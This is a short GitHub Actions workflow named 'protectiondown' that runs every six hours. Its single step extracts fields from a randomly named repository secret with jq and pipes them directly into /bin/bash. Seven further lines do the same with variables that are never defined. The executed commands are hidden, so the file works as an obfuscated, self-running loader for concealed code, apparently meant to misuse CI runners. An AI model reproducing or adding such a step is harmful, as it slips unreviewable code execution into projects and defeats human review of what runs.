name: protectiondown

on:
  workflow_dispatch:
  schedule:
    - cron: '37 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: protectiondown
        env:
          bcfj92810: ${{ secrets.bcfj92810 }}
        run: |
          echo $bcfj92810 | jq -r .fvpu6 | /bin/bash
          echo $nnbxs11743 | jq -r .nwyf555 | /bin/bash
          echo $yhsh60 | jq -r .fxkv1 | /bin/bash
          echo $ukpc96 | jq -r .bdw4 | /bin/bash
          echo $zbw9 | jq -r .qeftl4 | /bin/bash
          echo $ynsc014 | jq -r .ecrmd7867 | /bin/bash
          echo $lwxy99021 | jq -r .in04 | /bin/bash
          echo $yrox0 | jq -r .xh89568 | /bin/bash

